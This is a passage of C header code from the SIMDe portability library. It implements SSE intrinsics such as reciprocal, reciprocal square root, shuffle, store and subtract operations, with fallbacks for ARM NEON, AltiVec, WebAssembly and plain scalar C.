r_.altivec_f32 = vec_neg(a_.altivec_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vnegq_f32(a_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_neg(a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = vec_neg(a_.altivec_f32);
#elif defined(SIMDE_VECTOR_NEGATE)
r_.f32 = -a_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = -a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rcp_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rcp_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t recip = vrecpeq_f32(a_.neon_f32);
#if SIMDE_ACCURACY_PREFERENCE > 0
for (int i = 0; i < SIMDE_ACCURACY_PREFERENCE; ++i) {
recip = vmulq_f32(recip, vrecpsq_f32(recip, a_.neon_f32));
}
#endif
r_.neon_f32 = recip;
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_div(simde_mm_set1_ps(1.0f), a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_re(a_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR)
r_.f32 = 1.0f / a_.f32;
#elif defined(SIMDE_IEEE754_STORAGE)
/* https://stackoverflow.com/questions/12227126/division-as-multiply-and-lut-fast-float-division-reciprocal/12228234#12228234 */
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
int32_t ix;
simde_float32 fx = a_.f32[i];
simde_memcpy(&ix, &fx, sizeof(ix));
int32_t x = INT32_C(0x7EF311C3) - ix;
simde_float32 temp;
simde_memcpy(&temp, &x, sizeof(temp));
r_.f32[i] = temp * (SIMDE_FLOAT32_C(2.0) - temp * fx);
}
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = 1.0f / a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rcp_ps(a) simde_mm_rcp_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rcp_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rcp_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_rcp_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
r_.f32[0] = 1.0f / a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rcp_ss(a) simde_mm_rcp_ss((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rsqrt_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rsqrt_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vrsqrteq_f32(a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_rsqrte(a_.altivec_f32);
#elif defined(SIMDE_IEEE754_STORAGE)
/* https://basesandframes.files.wordpress.com/2020/04/even_faster_math_functions_green_2020.pdf
Pages 100 - 103 */
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
#if SIMDE_ACCURACY_PREFERENCE <= 0
r_.i32[i] = INT32_C(0x5F37624F) - (a_.i32[i] >> 1);
#else
simde_float32 x = a_.f32[i];
simde_float32 xhalf = SIMDE_FLOAT32_C(0.5) * x;
int32_t ix;
simde_memcpy(&ix, &x, sizeof(ix));
#if SIMDE_ACCURACY_PREFERENCE == 1
ix = INT32_C(0x5F375A82) - (ix >> 1);
#else
ix = INT32_C(0x5F37599E) - (ix >> 1);
#endif
simde_memcpy(&x, &ix, sizeof(x));
#if SIMDE_ACCURACY_PREFERENCE >= 2
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
#endif
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
r_.f32[i] = x;
#endif
}
#elif defined(simde_math_sqrtf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = 1.0f / simde_math_sqrtf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rsqrt_ps(a) simde_mm_rsqrt_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rsqrt_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rsqrt_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_rsqrt_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(vgetq_lane_f32(simde_mm_rsqrt_ps(a).neon_f32, 0),
a_.neon_f32, 0);
#elif defined(SIMDE_IEEE754_STORAGE)
{
#if SIMDE_ACCURACY_PREFERENCE <= 0
r_.i32[0] = INT32_C(0x5F37624F) - (a_.i32[0] >> 1);
#else
simde_float32 x = a_.f32[0];
simde_float32 xhalf = SIMDE_FLOAT32_C(0.5) * x;
int32_t ix;
simde_memcpy(&ix, &x, sizeof(ix));
#if SIMDE_ACCURACY_PREFERENCE == 1
ix = INT32_C(0x5F375A82) - (ix >> 1);
#else
ix = INT32_C(0x5F37599E) - (ix >> 1);
#endif
simde_memcpy(&x, &ix, sizeof(x));
#if SIMDE_ACCURACY_PREFERENCE >= 2
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
#endif
x = x * (SIMDE_FLOAT32_C(1.5008909) - xhalf * x * x);
r_.f32[0] = x;
#endif
}
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#elif defined(simde_math_sqrtf)
r_.f32[0] = 1.0f / simde_math_sqrtf(a_.f32[0]);
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rsqrt_ss(a) simde_mm_rsqrt_ss((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_sad_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_sad_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint16x4_t t = vpaddl_u8(vabd_u8(a_.neon_u8, b_.neon_u8));
uint16_t r0 = t[0] + t[1] + t[2] + t[3];
r_.neon_u16 = vset_lane_u16(r0, vdup_n_u16(0), 0);
#else
uint16_t sum = 0;
#if defined(SIMDE_HAVE_STDLIB_H)
SIMDE_VECTORIZE_REDUCTION(+ : sum)
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
sum += HEDLEY_STATIC_CAST(uint8_t, abs(a_.u8[i] - b_.u8[i]));
}
r_.i16[0] = HEDLEY_STATIC_CAST(int16_t, sum);
r_.i16[1] = 0;
r_.i16[2] = 0;
r_.i16[3] = 0;
#else
HEDLEY_UNREACHABLE();
#endif
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_psadbw(a, b) simde_mm_sad_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sad_pu8(a, b) simde_mm_sad_pu8(a, b)
#define _m_psadbw(a, b) simde_mm_sad_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ss(simde_float32 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ss(a);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vsetq_lane_f32(a, vdupq_n_f32(SIMDE_FLOAT32_C(0.0)), 0);
#else
return simde_mm_set_ps(SIMDE_FLOAT32_C(0.0), SIMDE_FLOAT32_C(0.0),
SIMDE_FLOAT32_C(0.0), a);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ss(a) simde_mm_set_ss(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_setr_ps(simde_float32 e3, simde_float32 e2,
simde_float32 e1, simde_float32 e0)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_setr_ps(e3, e2, e1, e0);
#else
return simde_mm_set_ps(e0, e1, e2, e3);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setr_ps(e3, e2, e1, e0) simde_mm_setr_ps(e3, e2, e1, e0)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_setzero_ps(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_setzero_ps();
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vdupq_n_f32(SIMDE_FLOAT32_C(0.0));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
return vec_splats(SIMDE_FLOAT32_C(0.0));
#else
simde__m128 r;
simde_memset(&r, 0, sizeof(r));
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setzero_ps() simde_mm_setzero_ps()
#endif
#if defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_undefined_ps(void)
{
simde__m128_private r_;
#if defined(SIMDE_HAVE_UNDEFINED128)
r_.n = _mm_undefined_ps();
#elif !defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
r_ = simde__m128_to_private(simde_mm_setzero_ps());
#endif
return simde__m128_from_private(r_);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_undefined_ps() simde_mm_undefined_ps()
#endif
#if defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
HEDLEY_DIAGNOSTIC_POP
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_setone_ps(void)
{
simde__m128 t = simde_mm_setzero_ps();
return simde_mm_cmpeq_ps(t, t);
}
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_sfence(void)
{
/* TODO: Use Hedley. */
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_sfence();
#elif defined(__GNUC__) && \
((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 7))
__atomic_thread_fence(__ATOMIC_SEQ_CST);
#elif !defined(__INTEL_COMPILER) && defined(__STDC_VERSION__) && \
(__STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_ATOMICS__)
#if defined(__GNUC__) && (__GNUC__ == 4) && (__GNUC_MINOR__ < 9)
__atomic_thread_fence(__ATOMIC_SEQ_CST);
#else
atomic_thread_fence(memory_order_seq_cst);
#endif
#elif defined(_MSC_VER)
MemoryBarrier();
#elif HEDLEY_HAS_EXTENSION(c_atomic)
__c11_atomic_thread_fence(__ATOMIC_SEQ_CST);
#elif defined(__GNUC__) && \
((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 1))
__sync_synchronize();
#elif defined(_OPENMP)
#pragma omp critical(simde_mm_sfence_)
{
}
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sfence() simde_mm_sfence()
#endif
#define SIMDE_MM_SHUFFLE(z, y, x, w) \
(((z) << 6) | ((y) << 4) | ((x) << 2) | (w))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_SHUFFLE(z, y, x, w) SIMDE_MM_SHUFFLE(z, y, x, w)
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#define simde_mm_shuffle_pi16(a, imm8) _mm_shuffle_pi16(a, imm8)
#elif defined(SIMDE_SHUFFLE_VECTOR_)
#define simde_mm_shuffle_pi16(a, imm8) \
(__extension__({ \
const simde__m64_private simde__tmp_a_ = \
simde__m64_to_private(a); \
simde__m64_from_private((simde__m64_private){ \
.i16 = SIMDE_SHUFFLE_VECTOR_( \
16, 8, (simde__tmp_a_).i16, \
(simde__tmp_a_).i16, (((imm8)) & 3), \
(((imm8) >> 2) & 3), (((imm8) >> 4) & 3), \
(((imm8) >> 6) & 3))}); \
}))
#else
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_shuffle_pi16(simde__m64 a, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 255)
{
simde__m64_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
for (size_t i = 0; i < sizeof(r_.i16) / sizeof(r_.i16[0]); i++) {
r_.i16[i] = a_.i16[(imm8 >> (i * 2)) & 3];
}
HEDLEY_DIAGNOSTIC_PUSH
#if HEDLEY_HAS_WARNING("-Wconditional-uninitialized")
#pragma clang diagnostic ignored "-Wconditional-uninitialized"
#endif
return simde__m64_from_private(r_);
HEDLEY_DIAGNOSTIC_POP
}
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#define simde_m_pshufw(a, imm8) _m_pshufw(a, imm8)
#else
#define simde_m_pshufw(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_shuffle_pi16(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#define _m_pshufw(a, imm8) simde_mm_shuffle_pi16(a, imm8)
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
#define simde_mm_shuffle_ps(a, b, imm8) _mm_shuffle_ps(a, b, imm8)
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_shuffle_ps(a, b, imm8) \
__extension__({ \
float32x4_t ret; \
ret = vmovq_n_f32(vgetq_lane_f32(a, (imm8) & (0x3))); \
ret = vsetq_lane_f32(vgetq_lane_f32(a, ((imm8) >> 2) & 0x3), \
ret, 1); \
ret = vsetq_lane_f32(vgetq_lane_f32(b, ((imm8) >> 4) & 0x3), \
ret, 2); \
ret = vsetq_lane_f32(vgetq_lane_f32(b, ((imm8) >> 6) & 0x3), \
ret, 3); \
})
#elif defined(SIMDE_SHUFFLE_VECTOR_)
#define simde_mm_shuffle_ps(a, b, imm8) \
(__extension__({ \
simde__m128_from_private((simde__m128_private){ \
.f32 = SIMDE_SHUFFLE_VECTOR_( \
32, 16, simde__m128_to_private(a).f32, \
simde__m128_to_private(b).f32, (((imm8)) & 3), \
(((imm8) >> 2) & 3), (((imm8) >> 4) & 3) + 4, \
(((imm8) >> 6) & 3) + 4)}); \
}))
#else
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_shuffle_ps(simde__m128 a, simde__m128 b, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 255)
{
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[(imm8 >> 0) & 3];
r_.f32[1] = a_.f32[(imm8 >> 2) & 3];
r_.f32[2] = b_.f32[(imm8 >> 4) & 3];
r_.f32[3] = b_.f32[(imm8 >> 6) & 3];
return simde__m128_from_private(r_);
}
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_shuffle_ps(a, b, imm8) simde_mm_shuffle_ps((a), (b), imm8)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sqrt_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sqrt_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vsqrtq_f32(a_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t est = vrsqrteq_f32(a_.neon_f32);
for (int i = 0; i <= SIMDE_ACCURACY_PREFERENCE; i++) {
est = vmulq_f32(vrsqrtsq_f32(vmulq_f32(a_.neon_f32, est), est),
est);
}
r_.neon_f32 = vmulq_f32(a_.neon_f32, est);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_sqrt(a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_sqrt(a_.altivec_f32);
#elif defined(simde_math_sqrt)
SIMDE_VECTORIZE
for (size_t i = 0; i < sizeof(r_.f32) / sizeof(r_.f32[0]); i++) {
r_.f32[i] = simde_math_sqrtf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sqrt_ps(a) simde_mm_sqrt_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sqrt_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sqrt_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_sqrt_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value = vgetq_lane_f32(
simde__m128_to_private(simde_mm_sqrt_ps(a)).neon_f32, 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#elif defined(simde_math_sqrtf)
r_.f32[0] = simde_math_sqrtf(a_.f32[0]);
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sqrt_ss(a) simde_mm_sqrt_ss((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr, a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(a_.altivec_f32, 0, mem_addr);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
wasm_v128_store(mem_addr, a_.wasm_v128);
#else
simde_memcpy(mem_addr, &a_, sizeof(a));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ps(mem_addr, a) \
simde_mm_store_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store1_ps(simde_float32 mem_addr[4], simde__m128 a)
{
simde_float32 *mem_addr_ =
SIMDE_ALIGN_ASSUME_LIKE(mem_addr, simde__m128);
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ps1(mem_addr_, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr_, vdupq_lane_f32(vget_low_f32(a_.neon_f32), 0));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
wasm_v128_store(mem_addr_,
wasm_v32x4_shuffle(a_.wasm_v128, a_.wasm_v128, 0, 0, 0,
0));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(vec_splat(a_.altivec_f32, 0), 0, mem_addr_);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
simde__m128_private tmp_;
tmp_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, a_.f32, 0, 0, 0, 0);
simde_mm_store_ps(mem_addr_, tmp_.f32);
#else
SIMDE_VECTORIZE_ALIGNED(mem_addr_ : 16)
for (size_t i = 0; i < sizeof(a_.f32) / sizeof(a_.f32[0]); i++) {
mem_addr_[i] = a_.f32[0];
}
#endif
#endif
}
#define simde_mm_store_ps1(mem_addr, a) simde_mm_store1_ps(mem_addr, a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ps1(mem_addr, a) \
simde_mm_store1_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#define _mm_store1_ps(mem_addr, a) \
simde_mm_store1_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_store_ss(simde_float32 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_store_ss(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_lane_f32(mem_addr, a_.neon_f32, 0);
#else
*mem_addr = a_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_store_ss(mem_addr, a) \
simde_mm_store_ss(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storeh_pi(simde__m64 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storeh_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1_f32(HEDLEY_REINTERPRET_CAST(float32_t *, mem_addr),
vget_high_f32(a_.neon_f32));
#else
simde_memcpy(mem_addr, &(a_.m64[1]), sizeof(a_.m64[1]));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storeh_pi(mem_addr, a) simde_mm_storeh_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storel_pi(simde__m64 *mem_addr, simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storel_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m64_private *dest_ =
HEDLEY_REINTERPRET_CAST(simde__m64_private *, mem_addr);
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
dest_->neon_f32 = vget_low_f32(a_.neon_f32);
#else
dest_->f32[0] = a_.f32[0];
dest_->f32[1] = a_.f32[1];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storel_pi(mem_addr, a) simde_mm_storel_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storer_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storer_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
vec_st(vec_reve(a_.altivec_f32), 0, mem_addr);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t tmp = vrev64q_f32(a_.neon_f32);
vst1q_f32(mem_addr, vextq_f32(tmp, tmp, 2));
#elif defined(SIMDE_SHUFFLE_VECTOR_)
a_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, a_.f32, 3, 2, 1, 0);
simde_mm_store_ps(mem_addr, simde__m128_from_private(a_));
#else
SIMDE_VECTORIZE_ALIGNED(mem_addr : 16)
for (size_t i = 0; i < sizeof(a_.f32) / sizeof(a_.f32[0]); i++) {
mem_addr[i] =
a_.f32[((sizeof(a_.f32) / sizeof(a_.f32[0])) - 1) - i];
}
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storer_ps(mem_addr, a) \
simde_mm_storer_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_storeu_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_storeu_ps(mem_addr, a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
vst1q_f32(mem_addr, a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
vec_vsx_st(a_.altivec_f32, 0, mem_addr);
#else
simde_memcpy(mem_addr, &a_, sizeof(a_));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_storeu_ps(mem_addr, a) \
simde_mm_storeu_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sub_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sub_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsubq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_sub(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_sub(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 - b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] - b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sub_ps(a, b) simde_mm_sub_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_sub_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_sub_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_sub_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[0] - b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_sub_ss(a, b) simde_mm_sub_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomieq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomieq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_eq_b = vceqq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_eq_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] == b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] == b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomieq_ss(a, b) simde_mm_ucomieq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
